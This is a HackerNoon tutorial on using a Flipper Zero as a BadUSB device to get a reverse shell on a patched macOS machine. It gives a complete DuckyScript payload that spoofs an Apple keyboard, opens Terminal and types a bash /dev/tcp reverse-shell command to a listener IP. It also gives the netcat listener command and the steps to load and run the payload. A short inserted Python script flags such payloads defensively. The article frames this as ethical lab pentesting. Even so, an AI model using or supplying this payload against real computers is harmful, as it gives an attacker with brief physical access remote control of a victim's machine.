How to Get a Reverse Shell on macOS Using A Flipper Zero as a BadUSB

Written by fatman | Published 2022/12/05
Tech Story Tags: cybersecurity | infosec | badusb | flipper-zero | ethical-hacking | hacking | hackernoon-top-story | pentesting


Using a Flipper Zero, a short 12-line DuckyScript text file, and a remote listener on my Ubuntu server, I was able to gain a shell on my fully patched, up-to-date macOS Ventura computer.

In my lab environment, I use Flipper Zero as a pentesting device to test vulnerabilities in my servers and desktop systems.

The Flipper Zero is our preferred ethical hacking tool because it offers an endless number of available payloads, has an on-screen menu selection tool, and uses a progress display to provide feedback.

This article is an example of how to use the Flipper Zero as an Ethical Pentesting BadUSB device and how to avoid becoming a victim of such an exploit. Do not use this on computers that you do not own or have permission to use. This code does not make an effort to hide from Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), Network Detection Systems, Firewalls, or Anti-Virus (AV) software.

BadUSB Payloads

The Flipper Zero BadUSB, like several other BadUSB devices, uses payloads written in DuckyScript, a simple scripting language for replaying keystrokes. Because the device presents itself as a keyboard and types the payload, the result is a keystroke injection attack.

A good starting point for DuckyScript payloads is the official Hak5 website: https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky. There you will find examples and documentation for DuckyScript.

Let’s Write Some DuckyScript

You can use a ready-made script, or you can learn to write your own. We'll show you how to obtain a reverse shell on a macOS computer in a simple step-by-step walkthrough.

Use your favorite text editor and enter the following text. macOS has the TextEdit application installed by default, so we'll use that.

ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
DELAY 1000
ENTER
DELAY 1000

For this walkthrough we don't need to know much about DuckyScript, so we'll only go over the commands our script uses. There are really only six different commands.

ID 05ac:021e Apple:Keyboard
    Tells macOS that the Flipper Zero is an Apple keyboard. Without this line, macOS displays the Keyboard Setup Assistant dialog, which causes the script to fail.

DELAY
    Waits for the given number of milliseconds before the next keystroke. Without these delays the script runs too fast and fails.

GUI SPACE
    Presses the Command key and the Space bar together to open the Spotlight Search window.

STRING terminal
    Types the text 'terminal' into the Spotlight Search window.

ENTER
    Presses the Enter (Return) key. After Enter is pressed, macOS launches the Terminal application (/Applications/Utilities/Terminal).

STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
    Types this command into the Terminal window. When run, it starts an interactive bash whose input and output are redirected over TCP to the Netcat listener at 10.10.10.157 on port 4444.

Change the IP address 10.10.10.157 and port 4444 to your server's IP address and port.

Save this file to disk as rev_shell_macos.txt. The badusb directory on the Flipper Zero has no subdirectories, so if you keep payloads for several operating systems, use a naming convention that tells you what each one does.
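As an added example (not part of the original article), here is a small Python triage script for the kind of DuckyScript payload shown above. It sums the DELAY values to estimate how long the payload runs, records the keyboard ID the payload claims, and flags typed commands that match a few assumed reverse-shell indicators, including the /dev/tcp form used in this walkthrough. The indicator list and the Report structure are my own assumptions, and the sample payload is a constructed copy of the script above.

```python
import re
from dataclasses import dataclass, field

# Constructed copy of the article's 12-line payload so the check runs offline.
SAMPLE_PAYLOAD = """\
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
DELAY 1000
ENTER
DELAY 1000
"""

# Patterns a reviewer would flag in typed text; an assumed, deliberately small list.
DEV_TCP = re.compile(r"/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})")
SUSPICIOUS = [
    (DEV_TCP, "bash /dev/tcp reverse shell"),
    (re.compile(r"\bnc\b.*\s-e\b"), "netcat with -e"),
]

@dataclass
class Report:
    spoofed_id: str = ""      # argument of the ID line, if present
    total_delay_ms: int = 0   # sum of all DELAY values
    findings: list = field(default_factory=list)   # (line number, label, typed text)
    callbacks: list = field(default_factory=list)  # (ip, port) pairs seen in /dev/tcp paths

def triage(script: str) -> Report:
    # Walk the payload line by line and summarise what it would type on the host.
    rep = Report()
    for lineno, raw in enumerate(script.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("REM"):  # skip blank lines and comments
            continue
        cmd, _, arg = line.partition(" ")
        if cmd == "ID":
            rep.spoofed_id = arg
        elif cmd == "DELAY" and arg.isdigit():
            rep.total_delay_ms += int(arg)
        elif cmd in ("STRING", "STRINGLN"):  # STRINGLN is STRING followed by Enter
            rep.findings.extend((lineno, label, arg) for p, label in SUSPICIOUS if p.search(arg))
            m = DEV_TCP.search(arg)
            if m:
                rep.callbacks.append((m.group(1), int(m.group(2))))
    return rep
```

Running triage(SAMPLE_PAYLOAD) reports the spoofed Apple keyboard ID, a total delay of 4400 ms, and a single finding on line 9 with the callback 10.10.10.157:4444, which is the kind of summary you want when reviewing a payload file pulled from a badusb directory.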

Installing the qFlipper Application

If you haven't installed the qFlipper application yet, go to the official Flipper Zero update page and select the installer for your operating system. The page is the firmware update page, but the links to download the qFlipper application are at the bottom.

https://flipperzero.one/update

Follow the instructions for your operating system to install the qFlipper application.

Getting the DuckyScript Onto the Flipper Zero

Open the qFlipper application and select the folder icon.

Select and double-click the SD Card icon to view the contents.

Locate and drag the rev_shell_macos.txt file we created earlier onto the badusb folder.

Remove the Flipper Zero from your computer when the file is done copying.

Waiting for a Reverse Shell

The Flipper Zero BadUSB is armed and ready to use. But first, we need to set up our remote listener on our server. On our Ubuntu server, start the Netcat listener with the following command:

$ nc -nlvp 4444

The breakdown of the command is listed in the following table. Again, you don't really need to know what this command is doing, other than that it waits for an incoming connection.

nc
    The Netcat command

-nlvp
    (n) no DNS resolution, (l) listen for an incoming connection, (v) verbose output, (p) port

4444
    Port number to listen on

Now that our Netcat listener is ready and waiting for an incoming connection, we can proceed with the Flipper Zero BadUSB attack.

Starting the BadUSB Reverse Shell

The hard part is done. The rev_shell_macos.txt file is written and copied to the Flipper Zero, and the Netcat listener is waiting for a connection.

Locate the Bad USB menu and select the Run button. Do not connect your Flipper Zero to your computer just yet. The Flipper Zero will let you know when it’s time to connect your device.

Navigate to the DuckyScript file we copied in the previous step. If you don't see the file, you copied it to the wrong directory or did not use the .txt filename extension. Select rev_shell_macos and click the Run button.

When you see the Connect to USB alert, you can connect your Flipper Zero to your iMac or MacBook’s USB port. Click the Run button.

You can watch the progress of your BadUSB script in the main window. Once the status reaches 100% the payload is complete and you can remove the Flipper Zero.

If you are watching the iMac's monitor, you can see Spotlight and Terminal open as the DuckyScript executes. The Netcat listener on the Ubuntu server shows the incoming connection and the resulting shell prompt.

Control of your Computer

You now have control of the macOS computer through a reverse shell. Because macOS is a BSD-derived Unix, you can use Unix command-line tools and a bash shell as if you were sitting at the physical iMac's keyboard.

You can use familiar commands like whoami, pwd, ls, or cd to navigate the filesystem and interact with the operating system.

Next Steps

Now that you understand how the Flipper Zero operates as a BadUSB device, you can create your own scripts. Use the Hak5 site or one of the many DuckyScript GitHub repositories you can find with a web search as a starting point for your own DuckyScript files.

Operate legally and ethically. Use this tool on devices that you own or have permission to use.


Written by fatman | Cybersecurity enthusiast, Technical Writer, Security+ Student, and sometime lockpicker
Published by HackerNoon on 2022/12/05